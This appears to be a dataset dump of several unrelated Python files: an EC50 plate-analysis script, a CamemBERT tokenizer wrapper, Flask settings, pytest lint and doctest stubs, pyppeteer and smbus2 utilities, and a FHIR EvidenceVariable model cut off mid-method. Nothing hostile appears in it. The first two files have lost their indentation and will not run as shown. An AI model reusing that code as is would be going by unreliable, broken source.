x_data.append(current_concentration)
current_concentration /= dilution_protocol
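# Illustrative ./data/setting.json layout inferred from the keys read above
# (all values below are made-up placeholders, not taken from the original project):
# {
#   "rule": {
#     "0h_datafile": "plate_0h.csv", "24h_datafile": "plate_24h.csv",
#     "sample_width": 6, "sample_height": 4,
#     "dilution_protocol": 3, "basic_width": 2,
#     "control_number": [1, 2], "output_directory": "run1",
#     "initial_concentration": 100
#   }
# }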
# load raw data
initial_sd_data = read_0h_data()
final_sd_data = read_24h_data()
# reshape data into the size of board
rebuild_0h_data = initial_sd_data.reshape((32, -1))
rebuild_24h_data = final_sd_data.reshape((32, -1))
# reshape data into a 2-dimensional array contains each group data
sample_divided_list_0h = split_array_into_samples(rebuild_0h_data, sample_width, sample_height)
sample_divided_list_24h = split_array_into_samples(rebuild_24h_data, sample_width, sample_height)
# handle data of control groups
control_0h_summary = 0
for number in control_number_list:
number = number - 1
sample = sample_divided_list_0h[number]
control_0h_summary = control_0h_summary + calculate_summary_of_sample(sample)
control_0h_average = control_0h_summary / (sample_width * sample_height * len(control_number_list))
control_24h_summary = 0
for number in control_number_list:
number = number - 1
sample = sample_divided_list_24h[number]
control_24h_summary = control_24h_summary + calculate_summary_of_sample(sample)
control_24h_average = control_24h_summary / (sample_width * sample_height * len(control_number_list))
# calculate standard deviation of each grid
sd_matrix = []
for line in rebuild_24h_data:
new_line = []
for element in line:
sd_data = (float(element) - control_0h_average.item()) \
/ (control_24h_average.item() - control_0h_average.item())
new_line.append(sd_data)
sd_matrix.append(new_line)
sd_matrix = np.array(sd_matrix)
# split array into different samples
sd_groups = split_array_into_samples(sd_matrix, sample_width, sample_height)
sd_groups = np.array(sd_groups, dtype=float)
RESULT_LIST = []
for sample in sd_groups:
result = calculate_avg_of_sample(sample, sample_width, basic_width)
RESULT_LIST.append(result)
RESULT_LIST = np.array(RESULT_LIST)
FULL_RESULT_LIST = []
for group in sd_groups:
x_index = 0
y_index = 0
sample_buffer = []
data_buffer = []
while y_index < sample_height:
while x_index < basic_width:
x = x_index
while x < sample_width:
data_buffer.append(group[y_index][x])
x += basic_width
sample_buffer.append(data_buffer)
data_buffer = []
x_index += 1
y_index += 1
x_index = 0
FULL_RESULT_LIST.append(sample_buffer)
FULL_RESULT_LIST = np.array(FULL_RESULT_LIST, dtype=float)
optional_color = ['red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple']
EC50_LIST = []
EC50_AVG_LIST = []
sample_num = 0
for SAMPLE in FULL_RESULT_LIST:
sample_num += 1
fig, ax = plt.subplots()
index = 0
ax.set_title('Sample '+str(sample_num))
x_buffer = []
x_sampling_buffer = []
y_sampling_buffer = []
for repeat in SAMPLE:
x, y, x_sampling, y_sampling = fit_sigmoid_curve(x_data, repeat)
x_buffer.append(x)
x_sampling_buffer.append(x_sampling)
y_sampling_buffer.append(y_sampling)
draw_single_curve(ax, x, y, x_sampling, y_sampling, optional_color[index])
index += 1
EC50_LIST.append(x_buffer)
# draw the average result
avg = np.mean(x_buffer)
EC50_AVG_LIST.append(avg)
# draw the average curve
x_sampling_buffer = np.array(x_sampling_buffer).T
y_sampling_buffer = np.array(y_sampling_buffer).T
x_sampling_avg = []
y_sampling_avg = []
for line in x_sampling_buffer:
x_sampling_avg.append(np.mean(line))
for line in y_sampling_buffer:
y_sampling_avg.append(np.mean(line))
ax.plot(avg, 0.5, 'o', color='black')
ax.plot(x_sampling_avg, y_sampling_avg, color='black')
plt.savefig("./output/" + output_directory + "/figs" + "/Sample " + str(sample_num))
plt.cla()
plt.close(fig)
# output grouped result
output_f_grouped = open("./output/" + output_directory + "/result_grouped.csv", "w")
csv_writer_grouped = csv.writer(output_f_grouped)
csv_writer_grouped.writerow(["initial concentration: " + str(initial_concentration), "dilution protocol: " + str(dilution_protocol)])
csv_writer_grouped.writerow("")
sample_num = 0
for SAMPLE in FULL_RESULT_LIST:
SAMPLE = SAMPLE.T
sample_num += 1
csv_writer_grouped.writerow(["Sample " + str(sample_num)])
for repeat in SAMPLE:
csv_writer_grouped.writerow(repeat)
csv_writer_grouped.writerow("")
ec50_result_list = []
for ec50_index in EC50_LIST[sample_num-1]:
ec50_result_list.append(10**ec50_index)
csv_writer_grouped.writerow(ec50_result_list)
average_ec50 = np.power(10, EC50_AVG_LIST[sample_num-1])
csv_writer_grouped.writerow([])
csv_writer_grouped.writerow(["Average EC50", "Std"])
csv_writer_grouped.writerow([average_ec50, np.std(ec50_result_list)])
csv_writer_grouped.writerow("")
output_f_grouped.close()
output_f_full = open("./output/" + output_directory + "/result_full.csv", "w")
csv_writer_full = csv.writer(output_f_full)
for line in sd_matrix:
csv_writer_full.writerow(line)
output_f_full.close()
print("Finished")
|
StarcoderdataPython
|
123200
|
from transformers import CamembertTokenizer
import os
tokenizer_dirname = os.path.dirname(__file__)
tokenizer_path = os.path.join(tokenizer_dirname, '../../res/models/emotion_classif/camembert_base/camembert-base-tokenizer')
class EmotionClassifTokenizer(object):
"""
    Class used to tokenize French sentences transcribed from audio using the camemBERT tokenizer
"""
tokenizer = CamembertTokenizer.from_pretrained(tokenizer_path)
def __init__(self):
"""
uses camembert tokenizer from huggingface in all cases
"""
"""
dirname = os.path.dirname(__file__)
tokenizer_path = os.path.join(dirname, '../../models/emotion_classif/camembert_base/camembert-base-tokenizer')
camembert_tokenizer = CamembertTokenizer.from_pretrained(tokenizer_path)
self.tokenizer = camembert_tokenizer
"""
pass
def tokenize(self, sentence_list, max_length=50):
"""
        Uses the camemBERT tokenizer to tokenize sentences, pad them to max_length and truncate them if they are too long for camemBERT.
        The default value of the max_length param comes from the monologg GitHub repo (allegedly the model's optimal hyperparameter value).
"""
return self.tokenizer(sentence_list, max_length=max_length, padding='max_length', truncation=True, return_tensors='pt')
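# --- Hedged usage sketch (not part of the original file) ---
#   tokenizer = EmotionClassifTokenizer()
#   batch = tokenizer.tokenize(["je suis content", "quelle journee difficile"])
# With the defaults above, `batch` is a dict-like BatchEncoding of PyTorch tensors
# padded/truncated to max_length=50, e.g. batch["input_ids"].shape == (2, 50).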
|
StarcoderdataPython
|
12824050
|
<reponame>Qiaojilim/raccroche_module2<filename>raccroche/module2/save_mwmoutput.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 13 15:16:43 2020
@author: qiaojixu
"""
"""
Module description:
--------------------
Module to save all mwm adjacency output.
"""
def save_simple (WS1,WS2, TreeNode, gf1, gf2,gf1_old, gf2_old, results_dir):
with open (results_dir +'InputPyfile/mwmOutput/W'+ str(WS1)+ TreeNode + '_' + str(gf1_old) + '_' + str(gf2_old) + '.txt') as f:
with open (results_dir +'InputPyfile/mwmOutput/W'+ str(WS2)+ TreeNode + '_' + str(gf1) + '_' + str(gf2) + '.txt','a') as f1:
for line in f:
f1.write(line)
|
StarcoderdataPython
|
9797118
|
# coding=utf-8
"""
Flask APP configuration
app = Flask(__name__)
1. Set configuration values directly
    app.config['TESTING'] = True
    Some configuration values are also mirrored on the Flask object and can be set through it directly:
    app.testing = True
    Several configuration values can be updated at once with the dict.update() method:
    app.config.update(
        TESTING=True,
        SECRET_KEY=b'aaa'
    )
2. Load configuration from an object
    app.config.from_object('yourapplication.default_settings')
3. Load configuration from an environment variable
    export MyAppConfig=/path/to/settings.cfg
    app.config.from_envvar('MyAppConfig')
4. Load configuration from a file
    app.config.from_pyfile('dev_config.py')  # here dev_config.py is a configuration file
"""
import os
from config import PATH_LOG
from helper.helper_date import HelperDate
class BaseSettings(object):
"""
    Base configuration.
    Configurations for the different environments all inherit from this class.
"""
    # The secret key is used to securely sign session cookies and can be used for other security needs of the app or its extensions. import os; print(os.urandom(24))
SECRET_KEY = b'<KEY>'
FLASK_ENV = 'development'
    # Whether to enable debug mode
DEBUG = False
    # Enable testing mode
TESTING = False
HOST = '127.0.0.1'
PORT = 5000
THREADED = True
    # If set to True, SQLAlchemy will log all issued statements to stderr
SQLALCHEMY_ECHO = False
#from .mysql import SQLALCHEMY_DATABASE_URI
    # SQLAlchemy configuration
#SQLALCHEMY_DATABASE_URI = SQLALCHEMY_DATABASE_URI
    # Multiple databases
#SQLALCHEMY_BINDS = MYSQL_BINDS
    # Size of the database connection pool. Defaults to the engine's default value (usually 5).
SQLALCHEMY_POOL_SIZE = 5
    # Timeout of the database connection pool. Defaults to 10.
SQLALCHEMY_POOL_TIMEOUT = 10
    # If set to True (the default), Flask-SQLAlchemy will track object modifications and emit signals. This requires extra memory and can be disabled if not needed.
SQLALCHEMY_TRACK_MODIFICATIONS = False
# logging
def _make_logfile(log_name=''):
        # If no log name is given, everything is written to one mixed log file
if not log_name:
return os.path.join(PATH_LOG, 'mixed_' + HelperDate.date_today() + '.log')
        # One directory per log name
log_dir = os.path.join(PATH_LOG, '%s' % log_name)
        # Create the directory if it does not exist
if not os.path.exists(log_dir):
os.makedirs(log_dir, 0o777)
return os.path.join(log_dir, '%s_' + HelperDate.date_today() + '.log') % log_name
LOG_LEVEL = 'DEBUG'
#LOG_FILE = os.path.join(PATH_LOG, '%s_' + os.sep + '%s' + HelperDate.date_today() + '.log')
LOG_FORMAT = os.linesep.join(
(
'%(asctime)s-【%(levelname)s】:[%(filename)s-%(module)s]=>[%(funcName)s:%(lineno)d]',
'%(pathname)s',
' %(message)s',
'-' * 80
)
)
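# --- Hedged sketch (not part of the original file) ---
# Environment-specific settings would typically subclass BaseSettings and be
# loaded with one of the mechanisms described in the module docstring, e.g.:
#
#   class DevelopmentSettings(BaseSettings):
#       DEBUG = True
#
#   app.config.from_object('settings.DevelopmentSettings')  # hypothetical module path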
|
StarcoderdataPython
|
53403
|
<filename>.ci/test_lint_doctests.py<gh_stars>0
# Pytest stub for running lint tests and doctests
# Running these checks through pytest allows us to report any errors in Junit format,
# which is posted directly on the PR
import os
import pathlib
import shutil
import subprocess
import textwrap
import pytest
def check_output(proc: subprocess.CompletedProcess):
# Check the subprocess output, and raise an exception with the stdout/stderr dump if there was a non-zero exit
# The `check=True` flag available in `subprocess.run` does not print stdout/stderr
if proc.returncode == 0:
return
error_msg = textwrap.dedent(f"""\
Command {proc.args} failed with exit code {proc.returncode}.
----Begin stdout----
{proc.stdout}
----End stdout------
----Begin stderr----
{proc.stderr}
----End stderr------""")
raise RuntimeError(error_msg)
@pytest.mark.timeout(0)
def test_run_pre_commit_hooks():
composer_root = os.path.join(os.path.dirname(__file__), "..")
check_output(
subprocess.run(
["pre-commit", "run", "--all-files", "--show-diff-on-failure"],
cwd=composer_root,
capture_output=True,
text=True,
))
@pytest.mark.timeout(0)
def test_run_doctests():
docs_folder = pathlib.Path(os.path.dirname(__file__)) / '..' / 'docs'
api_reference_folder = docs_folder / 'source' / 'api_reference'
# Remove the `api_reference` folder, which isn't automatically removed via `make clean`
shutil.rmtree(api_reference_folder, ignore_errors=True)
check_output(subprocess.run(["make", "clean"], cwd=docs_folder, capture_output=True, text=True))
# Must build the html first to ensure that doctests in .. autosummary:: generated pages are included
check_output(subprocess.run(["make", "html"], cwd=docs_folder, capture_output=True, text=True))
check_output(subprocess.run(["make", "doctest"], cwd=docs_folder, capture_output=True, text=True))
|
StarcoderdataPython
|
6504664
|
<reponame>Sab0tag3d/pyppeteer<gh_stars>1000+
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Utility functions."""
import gc
import socket
from typing import Dict, Optional
from pyppeteer.chromium_downloader import check_chromium, chromium_executable
from pyppeteer.chromium_downloader import download_chromium
__all__ = [
'check_chromium',
'chromium_executable',
'download_chromium',
'get_free_port',
'merge_dict',
]
def get_free_port() -> int:
"""Get free port."""
sock = socket.socket()
sock.bind(('localhost', 0))
port = sock.getsockname()[1]
sock.close()
del sock
gc.collect()
return port
def merge_dict(dict1: Optional[Dict], dict2: Optional[Dict]) -> Dict:
"""Merge two dictionaries into new one."""
new_dict = {}
if dict1:
new_dict.update(dict1)
if dict2:
new_dict.update(dict2)
return new_dict
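# --- Illustrative usage (not part of the original module) ---
#   merge_dict({'a': 1}, {'b': 2})  -> {'a': 1, 'b': 2}
#   merge_dict(None, {'b': 2})      -> {'b': 2}
#   get_free_port()                 -> an OS-assigned free TCP port on localhost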
|
StarcoderdataPython
|
9750734
|
<filename>smbus2/__main__.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ## #############################################################
# board.py
#
# Author: <NAME>
# Licence: MIT
# Date: 2020.03.01
#
# ## #############################################################
from . import smbus as smbus2
from .vi2cbus import Vi2cSlave
import struct
SLAVE_ADDR = 0x0a
class TestSlave(Vi2cSlave):
def __init__(self):
super().__init__(SLAVE_ADDR)
def read(self):
return [0, 0, 69, 0]
def write(self, value):
print("Write:", value)
slave = TestSlave()
def read(i2c):
# Creates a message object to read 4 bytes from SLAVE_ADDR
msg = smbus2.i2c_msg.read(SLAVE_ADDR, 4)
i2c.i2c_rdwr(msg) # Performs read
if msg.len > 0:
# if we got data, unpack and print
val = struct.unpack('<f', msg.buf)
print('Received: {} = {}'.format(msg.buf, val))
else:
print('No data received')
def write(i2c):
val = 100
data = struct.pack('<f', val) # Packs number as float
# Creates a message object to write 4 bytes from SLAVE_ADDR
msg = smbus2.i2c_msg.write(SLAVE_ADDR, data)
i2c.i2c_rdwr(msg) # Performs write
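# Editor's illustration (not part of the original file): struct.pack('<f', 100)
# yields the 4-byte little-endian IEEE-754 encoding b'\x00\x00\xc8B', which is
# what gets written to SLAVE_ADDR above; struct.unpack('<f', ...) reverses it
# on the read path.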
def main():
i2c = smbus2.SMBus(1)
read(i2c)
write(i2c)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3314611
|
<reponame>ItayGoren/fhir.resources<filename>fhir/resources/evidencevariable.py
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/EvidenceVariable
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from typing import Any, Dict
from typing import List as ListType
from pydantic import Field, root_validator
from . import backboneelement, domainresource, fhirtypes
class EvidenceVariable(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A population, intervention, or exposure definition.
The EvidenceVariable resource describes a "PICO" element that knowledge
(evidence, assertion, recommendation) is about.
"""
resource_type = Field("EvidenceVariable", const=True)
approvalDate: fhirtypes.Date = Field(
None,
alias="approvalDate",
title="When the evidence variable was approved by publisher",
description=(
"The date on which the resource content was approved by the publisher. "
"Approval happens once when the content is officially approved for "
"usage."
),
# if property is element of this resource.
element_property=True,
)
approvalDate__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_approvalDate", title="Extension field for ``approvalDate``."
)
author: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="author",
title="Who authored the content",
description=(
"An individiual or organization primarily involved in the creation and "
"maintenance of the content."
),
# if property is element of this resource.
element_property=True,
)
characteristic: ListType[fhirtypes.EvidenceVariableCharacteristicType] = Field(
...,
alias="characteristic",
title="What defines the members of the evidence element",
description=(
"A characteristic that defines the members of the evidence element. "
'Multiple characteristics are applied with "and" semantics.'
),
# if property is element of this resource.
element_property=True,
)
contact: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
copyright: fhirtypes.Markdown = Field(
None,
alias="copyright",
title="Use and/or publishing restrictions",
description=(
"A copyright statement relating to the evidence variable and/or its "
"contents. Copyright statements are generally legal restrictions on the"
" use and publishing of the evidence variable."
),
# if property is element of this resource.
element_property=True,
)
copyright__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_copyright", title="Extension field for ``copyright``."
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the evidence variable was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the evidence variable changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the evidence variable",
description=(
"A free text natural language description of the evidence variable from"
" a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
editor: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="editor",
title="Who edited the content",
description=(
"An individual or organization primarily responsible for internal "
"coherence of the content."
),
# if property is element of this resource.
element_property=True,
)
effectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="effectivePeriod",
title="When the evidence variable is expected to be used",
description=(
"The period during which the evidence variable content was or is "
"planned to be in active use."
),
# if property is element of this resource.
element_property=True,
)
endorser: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="endorser",
title="Who endorsed the content",
description=(
"An individual or organization responsible for officially endorsing the"
" content for use in some setting."
),
# if property is element of this resource.
element_property=True,
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the evidence variable",
description=(
"A formal identifier that is used to identify this evidence variable "
"when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
jurisdiction: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="jurisdiction",
title="Intended jurisdiction for evidence variable (if applicable)",
description=(
"A legal or geographic region in which the evidence variable is "
"intended to be used."
),
# if property is element of this resource.
element_property=True,
)
lastReviewDate: fhirtypes.Date = Field(
None,
alias="lastReviewDate",
title="When the evidence variable was last reviewed",
description=(
"The date on which the resource content was last reviewed. Review "
"happens periodically after approval but does not change the original "
"approval date."
),
# if property is element of this resource.
element_property=True,
)
lastReviewDate__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_lastReviewDate", title="Extension field for ``lastReviewDate``."
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Name for this evidence variable (computer friendly)",
description=(
"A natural language name identifying the evidence variable. This name "
"should be usable as an identifier for the module by machine processing"
" applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
note: ListType[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Used for footnotes or explanatory notes",
description=(
"A human-readable string to clarify or explain concepts about the "
"resource."
),
# if property is element of this resource.
element_property=True,
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the evidence"
" variable."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
relatedArtifact: ListType[fhirtypes.RelatedArtifactType] = Field(
None,
alias="relatedArtifact",
title="Additional documentation, citations, etc.",
description=(
"Related artifacts such as additional documentation, justification, or "
"bibliographic references."
),
# if property is element of this resource.
element_property=True,
)
reviewer: ListType[fhirtypes.ContactDetailType] = Field(
None,
alias="reviewer",
title="Who reviewed the content",
description=(
"An individual or organization primarily responsible for review of some"
" aspect of the content."
),
# if property is element of this resource.
element_property=True,
)
shortTitle: fhirtypes.String = Field(
None,
alias="shortTitle",
title="Title for use in informal contexts",
description=(
"The short title provides an alternate title for use in informal "
"descriptive contexts where the full, formal title is not necessary."
),
# if property is element of this resource.
element_property=True,
)
shortTitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_shortTitle", title="Extension field for ``shortTitle``."
)
status: fhirtypes.Code = Field(
...,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this evidence variable. Enables tracking the life-cycle "
"of the content."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
subtitle: fhirtypes.String = Field(
None,
alias="subtitle",
title="Subordinate title of the EvidenceVariable",
description=(
"An explanatory or alternate title for the EvidenceVariable giving "
"additional information about its content."
),
# if property is element of this resource.
element_property=True,
)
subtitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_subtitle", title="Extension field for ``subtitle``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this evidence variable (human friendly)",
description="A short, descriptive, user-friendly title for the evidence variable.",
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
topic: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="topic",
title=(
"The category of the EvidenceVariable, such as Education, Treatment, "
"Assessment, etc."
),
description=(
"Descriptive topics related to the content of the EvidenceVariable. "
"Topics provide a high-level categorization grouping types of "
"EvidenceVariables that can be useful for filtering and searching."
),
# if property is element of this resource.
element_property=True,
)
type: fhirtypes.Code = Field(
None,
alias="type",
title="dichotomous | continuous | descriptive",
description=(
"The type of evidence element, a population, an exposure, or an " "outcome."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=["dichotomous", "continuous", "descriptive"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
url: fhirtypes.Uri = Field(
None,
alias="url",
title=(
"Canonical identifier for this evidence variable, represented as a URI "
"(globally unique)"
),
description=(
"An absolute URI that is used to identify this evidence variable when "
"it is referenced in a specification, model, design or an instance; "
"also called its canonical identifier. This SHOULD be globally unique "
"and SHOULD be a literal address at which at which an authoritative "
"instance of this evidence variable is (or will be) published. This URL"
" can be the target of a canonical reference. It SHALL remain the same "
"when the evidence variable is stored on different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate evidence variable instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the evidence variable",
description=(
"The identifier that is used to identify this version of the evidence "
"variable when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the evidence variable "
"author and is not expected to be globally unique. For example, it "
"might be a timestamp (e.g. yyyymmdd) if a managed version is not "
"available. There is also no expectation that versions can be placed in"
" a lexicographical sequence. To provide a version consistent with the "
"Decision Support Service specification, use the format "
"Major.Minor.Revision (e.g. 1.0.0). For more information on versioning "
"knowledge assets, refer to the Decision Support Service specification."
" Note that a version is required for non-experimental active "
"artifacts."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
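# --- Hedged usage sketch (not part of the generated model) ---
# A minimal, illustrative construction of the resource defined above, assuming
# the standard pydantic-style constructor used throughout this package. Field
# values are made up; `characteristic` (defined further below and required by
# the FHIR specification) is supplied as a plain dict for brevity:
#
#     variable = EvidenceVariable(
#         status="draft",
#         name="SystolicBPOver140",
#         characteristic=[
#             {"definitionCodeableConcept": {"text": "Systolic BP > 140 mmHg"}}
#         ],
#     )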
class EvidenceVariableCharacteristic(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
What defines the members of the evidence element.
A characteristic that defines the members of the evidence element. Multiple
characteristics are applied with "and" semantics.
"""
resource_type = Field("EvidenceVariableCharacteristic", const=True)
definitionCanonical: fhirtypes.Canonical = Field(
None,
alias="definitionCanonical",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["ActivityDefinition"],
)
definitionCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_definitionCanonical",
title="Extension field for ``definitionCanonical``.",
)
definitionCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="definitionCodeableConcept",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionDataRequirement: fhirtypes.DataRequirementType = Field(
None,
alias="definitionDataRequirement",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionExpression: fhirtypes.ExpressionType = Field(
None,
alias="definitionExpression",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionReference: fhirtypes.ReferenceType = Field(
None,
alias="definitionReference",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Group"],
)
definitionTriggerDefinition: fhirtypes.TriggerDefinitionType = Field(
None,
alias="definitionTriggerDefinition",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
description: fhirtypes.String = Field(
None,
alias="description",
title="Natural language description of the characteristic",
description=(
"A short, natural language description of the characteristic that could"
" be used to communicate the criteria to an end-user."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
exclude: bool = Field(
None,
alias="exclude",
title="Whether the characteristic includes or excludes members",
description=(
"When true, members with this characteristic are excluded from the "
"element."
),
# if property is element of this resource.
element_property=True,
)
exclude__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_exclude", title="Extension field for ``exclude``."
)
groupMeasure: fhirtypes.Code = Field(
None,
alias="groupMeasure",
title=(
"mean | median | mean-of-mean | mean-of-median | median-of-mean | "
"median-of-median"
),
description=(
"Indicates how elements are aggregated within the study effective "
"period."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
        # but use them at your own responsibility; read the official FHIR documentation.
enum_values=[
"mean",
"median",
"mean-of-mean",
"mean-of-median",
"median-of-mean",
"median-of-median",
],
)
groupMeasure__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_groupMeasure", title="Extension field for ``groupMeasure``."
)
participantEffectiveDateTime: fhirtypes.DateTime = Field(
None,
alias="participantEffectiveDateTime",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
participantEffectiveDateTime__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_participantEffectiveDateTime",
title="Extension field for ``participantEffectiveDateTime``.",
)
participantEffectiveDuration: fhirtypes.DurationType = Field(
None,
alias="participantEffectiveDuration",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
participantEffectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="participantEffectivePeriod",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
participantEffectiveTiming: fhirtypes.TimingType = Field(
None,
alias="participantEffectiveTiming",
title="What time period do participants cover",
description="Indicates what effective period the study covers.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e participantEffective[x]
one_of_many="participantEffective",
one_of_many_required=False,
)
timeFromStart: fhirtypes.DurationType = Field(
None,
alias="timeFromStart",
title="Observation time from study start",
description="Indicates duration from the participant's study entry.",
# if property is element of this resource.
element_property=True,
)
usageContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="usageContext",
title="What code/value pairs define members?",
description=(
"Use UsageContext to define the members of the population, such as Age "
"Ranges, Genders, Settings."
),
# if property is element of this resource.
element_property=True,
)
@root_validator(pre=True)
def validate_one_of_many(cls, values: Dict[str, Any]) -> Dict[str, Any]:
